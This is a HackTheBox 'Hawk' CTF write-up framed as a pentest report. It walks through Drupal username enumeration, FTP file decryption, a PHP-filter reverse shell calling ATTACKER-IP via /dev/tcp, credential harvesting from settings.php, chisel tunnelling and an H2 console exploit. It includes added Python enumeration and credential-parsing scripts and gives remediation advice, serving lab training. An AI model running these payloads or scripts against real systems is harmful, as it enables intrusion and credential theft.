Hawk CTF Writeup
This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Hawk CTF from HackTheBox. The writeup takes the form of a detailed pentest report.
Hawk CTF
Hawk CTF is a medium to hard difficulty machine, which provides excellent practice in pentesting Drupal. The exploitable H2 DBMS installation is also realistic as web-based SQL consoles (RavenDB etc.) are found in many environments. The OpenSSL decryption challenge increases the difficulty of this machine.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.
Executive Summary
Introduction
This document shows the results of a security assessment performed on the Hawk machine (IP: 10.10.10.102). The report provides a comprehensive analysis of the findings, including vulnerability explanations, severity ratings, and steps to reproduce the identified vulnerabilities.
Objective
The assessment sought to identify vulnerabilities that could potentially lead to unauthorized access, data compromise, or privilege escalation. By conducting controlled exploitation scenarios, the assessment aimed to highlight the impact of these vulnerabilities and provide actionable recommendations for remediation.
Requirements
The assessment was conducted with the following requirements in mind:
- Identify vulnerabilities within the Drupal CMS installation.
- Exploit vulnerabilities to demonstrate potential impact.
- Assess the effectiveness of access controls and authentication mechanisms.
- Demonstrate privilege escalation from user-level to root.
- Provide detailed vulnerability explanations, severity ratings, and remediation recommendations.
High-Level Summary
The assessment uncovered several vulnerabilities within the Hawk machine:
- User Enumeration via Password Reset Error Message (Moderate Severity)
- Credentials Exposed via .drupal.txt.enc Decryption (High Severity)
- Initial Access via PHP Filter Module on Drupal CMS (High Severity)
- Cleartext Credentials Disclosure that led to LPE to the "daniel" user (High Severity)
- Outdated software that led to LPE to root - H2 Database Console (Extreme Severity)
Detailed Findings
Detailed vulnerability explanations, vulnerability fixes, severity ratings, and steps to reproduce the identified vulnerabilities are documented in the "Independent Challenge" section.
Recommendations
Based on the assessment findings, the following recommendations are advised to enhance the security posture of the Hawk machine:
- CMS Security: Remove unnecessary modules, such as the PHP Filter Module, to reduce attack surface. Implement 2FA.
- Insecure Practices Related to Credentials: Enforce strong password policies and avoid password reuse, and review and improve the encryption and storage of sensitive files containing credentials.
- FTP Security: Disable anonymous login, restrict the FTP service to authenticated accounts that need it, and do not store files containing credentials on the share.
- Update H2 Database Console: Regularly update H2 Database to the latest version to mitigate known vulnerabilities.
Methodology
Behind Security's penetration test followed a comprehensive and structured methodology, incorporating the following key phases:
Reconnaissance: The initial phase involved gathering information about open ports.
Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.
Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.
Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system's security.
Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.
Color Legend
Console color legend:
Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity
Risk Classification
Independent Challenge - 10.10.10.102
Service Enumeration
IP Address | Ports Open
--- | ---
10.10.10.102 | TCP: 21, 22, 80, 5435, 8082, 9092
Web Server Enumeration (TCP: 80)
Running Apache httpd 2.4.29.
CMS Enumeration
The droopescan tool identified plugins, themes, and possible version information, including the default admin login URL. The command used was: droopescan scan drupal -u http://10.10.10.102
Username enumeration
Vulnerability Explanation: The password reset form at /user/password responds differently depending on whether the submitted name exists. For an unknown name, Drupal re-renders the form (HTTP 200) with an error stating that the name is not recognized as a user name or an e-mail address; for an existing account it redirects after queuing the reset e-mail. This differential lets an attacker turn a wordlist into a list of valid accounts, facilitating targeted password attacks.
Vulnerability Fix: Modify the error message to avoid disclosing valid usernames. Implement proper error handling and validation.
Severity: Moderate
Steps to Reproduce the Finding:
- Run the following command. The form_build_id value is copied from the rendered reset form; fetch a fresh one from /user/password before scanning:
wfuzz -d "name=FUZZ&form_build_id=form-0SR6gkn5bmPLfm6PeBEdlOna5oOMAsN2YUFI21ja-iM&form_id=user_pass&op=E-mail+new+password" -w /usr/share/seclists/Usernames/Names/names.txt -H "Content-Type: application/x-www-form-urlencoded" --hc 200 http://10.10.10.102/user/password
- Responses with status 200 (the re-rendered form with the "not recognized" error) are hidden by --hc 200; the names whose responses remain, i.e. the redirects, are valid usernames.
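The same check as a small script, added here as an example and not part of the original report or of any Drupal tooling. It assumes the response differential described above (HTTP 200 plus the "is not recognized" message for an unknown name, a redirect for a known one), fetches a fresh form_build_id instead of hard-coding one, and refuses to label a response it does not understand, so a stale form_build_id or an anti-automation module shows up as "unknown" rather than as a false positive. The function and variable names are the example's own.

```python
"""Drupal 7 password-reset username enumeration (added example, stdlib only).

Assumption: POSTing an unknown name to /user/password re-renders the form
(HTTP 200) with "... is not recognized as a user name or an e-mail address",
while a known account triggers a redirect. That is the differential the
wfuzz command with --hc 200 relies on.
"""
import http.client
import re
import sys
import urllib.parse

NOT_RECOGNIZED = re.compile(r"is not recognized as a user name", re.I)
FORM_BUILD_ID = re.compile(r'name="form_build_id"[^>]*value="([^"]+)"')


def extract_form_build_id(html):
    """Return the form_build_id embedded in the rendered /user/password page."""
    m = FORM_BUILD_ID.search(html)
    if not m:
        raise ValueError("no form_build_id in page; is this a Drupal form?")
    return m.group(1)


def classify(status, body):
    """Verdict for one response: "valid", "invalid" or "unknown".

    "unknown" covers anything outside the two expected shapes (e.g. a 200
    without the error text), so a scan never silently reports garbage.
    """
    if status in (302, 303):
        return "valid"
    if status == 200 and NOT_RECOGNIZED.search(body):
        return "invalid"
    return "unknown"


def build_form(name, form_build_id):
    """POST body exactly as the browser submits the reset form."""
    return urllib.parse.urlencode({
        "name": name,
        "form_build_id": form_build_id,
        "form_id": "user_pass",
        "op": "E-mail new password",
    })


def probe(host, name, form_build_id, port=80, path="/user/password"):
    """POST one candidate name and classify the reply (redirects not followed)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", path, body=build_form(name, form_build_id),
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return classify(resp.status, body)


def enumerate_users(host, wordlist, port=80):
    """Fetch a fresh form_build_id, then test every name in wordlist."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("GET", "/user/password")
    page = conn.getresponse().read().decode("utf-8", "replace")
    conn.close()
    fbid = extract_form_build_id(page)
    return {name: probe(host, name, fbid, port) for name in wordlist}


if __name__ == "__main__":
    # usage: python enum_users.py 10.10.10.102 /usr/share/seclists/Usernames/Names/names.txt
    target = sys.argv[1]
    with open(sys.argv[2]) as fh:
        names = [line.strip() for line in fh if line.strip()]
    for name, verdict in enumerate_users(target, names).items():
        if verdict != "invalid":
            print(f"{verdict:8} {name}")
```

Because only "valid" and "unknown" are printed, a run that prints nothing but "unknown" lines is the signal to stop and look at the raw responses rather than to trust the verdicts.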
FTP Enumeration (TCP: 21)
Anonymous Login and Data Leakage
Vulnerability Explanation: Anonymous login is enabled on the FTP server, allowing unauthenticated access. An encrypted file, .drupal.txt.enc, containing potentially sensitive data was found in the messages directory. After downloading the file, Behind Security recovered its decryption password by brute force with the tool bruteforce-salted-openssl and revealed the credentials for the admin user of Drupal CMS.
Vulnerability Fix: Disable anonymous FTP login. Review and improve the encryption and storage of sensitive files.
Severity: High
Steps to Reproduce the Attack:
- Log into the FTP server by leveraging the anonymous login capability: run
ftp anonymous@10.10.10.102
and press enter when prompted for the password.
- Download the encrypted file at messages/.drupal.txt.enc.
- Decode it from base64 and save the raw ciphertext to another file:
cat .drupal.txt.enc | base64 -d > drupal.txt
- Locally, recover the decryption password by brute force. The decoded file is openssl enc output with the Salted__ header, which is the format bruteforce-salted-openssl expects; the digest given with -d must match the one openssl used for key derivation (SHA-256 here):
bruteforce-salted-openssl -f /usr/share/wordlists/rockyou.txt -d SHA256 -t 5 drupal.txt
- With the recovered decryption password (REDACTED), decrypt the file. The command is:
openssl enc -aes-256-cbc -d -in drupal.txt -out decrypted.txt -k friends
On OpenSSL releases older than 1.1.0 the default key-derivation digest was MD5, so add -md sha256 there to match the digest the password was recovered with.
- The decrypted file contains the admin password (REDACTED); use it to log in to Drupal CMS on port 80 as admin.
Initial Access - Tricking the CMS to Execute Malicious PHP Code
Vulnerability Explanation: Behind Security gained access to the Drupal CMS as an admin and exploited the PHP Filter Module to execute malicious PHP code.
Vulnerability Fix: Disable the PHP Filter Module altogether and conduct a thorough review of user permissions to prevent unauthorized code execution.
Severity: High
Steps to Reproduce the Attack:
- Log in as admin with the previously discovered password.
- Go to Modules, check PHP Filter and click Save configuration.
- Go to Add content, select Basic page or Article and insert malicious PHP code in the body. In this case:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/PORT 0>&1 '"); ?>
- Set Text format to PHP code and click Preview. The code executes server-side as soon as the preview is rendered, so have a listener waiting on ATTACKER-IP:PORT beforehand.
Post-Exploitation
Privilege Escalation to "daniel"
Vulnerability Explanation: Behind Security conducted further enumeration and discovered credentials for a user named "daniel" by analyzing configuration files related to Drupal CMS.
Vulnerability Fix: Enforce unique and strong credentials for each user account. Avoid reusing passwords across different services.
Severity: High
Steps to Reproduce the Attack:
- Behind Security executed the following command to pull the database connection settings out of every settings.php on the host:
find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null
- The database password stored in cleartext in settings.php turned out to be reused for the local user "daniel".
- Behind Security was able to log in via SSH as daniel@10.10.10.102, specifying the password: REDACTED
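The find and grep above, as a small parser added here for the example (not part of the report). It walks a tree for settings.php files, extracts each connection's driver, database, username, password, host, port and prefix from the Drupal 7 array syntax, and pulls $drupal_hash_salt, which is worth collecting too since it is needed to forge password hashes offline. The embedded settings.php text is constructed with placeholder values and is not the target's file; names of the functions are the example's own. Values containing a quote character are not handled, which is noted in the code.

```python
"""Harvest database credentials from Drupal 7 settings.php files (added example).

Mirrors `find / -name settings.php -exec grep ...` from the report, but
returns structured data so the values can be fed to other checks.
"""
import os
import re
import sys

KEYS = ("driver", "database", "username", "password", "host", "port", "prefix")
# Matches  'key' => 'value'  with single or double quotes and any spacing.
# Limitation: a value containing a quote character will be cut short.
PAIR = re.compile(r"['\"](" + "|".join(KEYS) + r")['\"]\s*=>\s*['\"]([^'\"]*)['\"]")
SALT = re.compile(r"\$drupal_hash_salt\s*=\s*['\"]([^'\"]*)['\"]")


def parse_settings(text):
    """Return {"connections": [dict, ...], "hash_salt": str or None}.

    Each connection is one Drupal 7 array of key => value pairs. A key that
    repeats means a new connection has started, which copes with any key
    order and with settings.php files that declare several connections.
    """
    conns, cur = [], {}
    for key, value in PAIR.findall(text):
        if key in cur:
            conns.append(cur)
            cur = {}
        cur[key] = value
    if cur:
        conns.append(cur)
    m = SALT.search(text)
    return {"connections": conns, "hash_salt": m.group(1) if m else None}


def find_settings(root):
    """Yield every settings.php below root (what `find -name settings.php` did)."""
    for dirpath, _, files in os.walk(root):
        if "settings.php" in files:
            yield os.path.join(dirpath, "settings.php")


def harvest(root):
    """Map each settings.php path under root to its parsed credentials."""
    out = {}
    for path in find_settings(root):
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                out[path] = parse_settings(fh.read())
        except OSError:
            continue  # unreadable as the current user; move on
    return out


# Constructed sample in the Drupal 7 layout; placeholder values only.
SAMPLE = """<?php
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'PLACEHOLDER-db-pass',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
$drupal_hash_salt = 'PLACEHOLDER-salt';
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, info in harvest(sys.argv[1]).items():
            print(path, info)
    else:
        print(parse_settings(SAMPLE))
```

Every username/password pair returned is a candidate for reuse against SSH, FTP and the CMS itself; on this engagement the database password was what opened the "daniel" account.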
Privilege Escalation to root
Vulnerability Explanation: Behind Security established a SOCKS tunnel to the victim with the tool "chisel", reached the H2 Database Console (version 1.4.196, listening on localhost:8082) through it, and exploited a known vulnerability in that version with a public exploit to execute commands. The resulting command execution ran as root.
Vulnerability Fix: Regularly update and patch software components, including databases, to fix known vulnerabilities.
Severity: Extreme
Steps to Reproduce the Attack:
- Behind Security established a reverse SOCKS tunnel between their machine and the victim machine using chisel. On the attacker host:
./chisel server -p 1337 --reverse --socks5 &
On the victim:
./chisel client ATTACKER-IP:1337 R:socks &
- Behind Security accessed the H2 Database Console (localhost:8082) through the tunnel, so that the connection reaches the console from the victim's own loopback interface.
- The attacker exploited the H2 Database vulnerability using a public exploit (Exploit-DB ID 45506), with proxychains configured to use the chisel SOCKS listener (127.0.0.1:1080 by default). The command used during the engagement was:
proxychains4 python 45506.py -H localhost:8082
Conclusion
Behind Security successfully executed malicious PHP code within the CMS, escalated privileges to user “daniel”, and further exploited vulnerabilities in the H2 Database to gain root access. These findings underscore the importance of regularly updating and securing software components, implementing proper access controls, and maintaining strong authentication practices to mitigate the risk of unauthorized access and privilege escalation. Remediation measures should be promptly applied to address the identified vulnerabilities and enhance the security posture of the system.
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!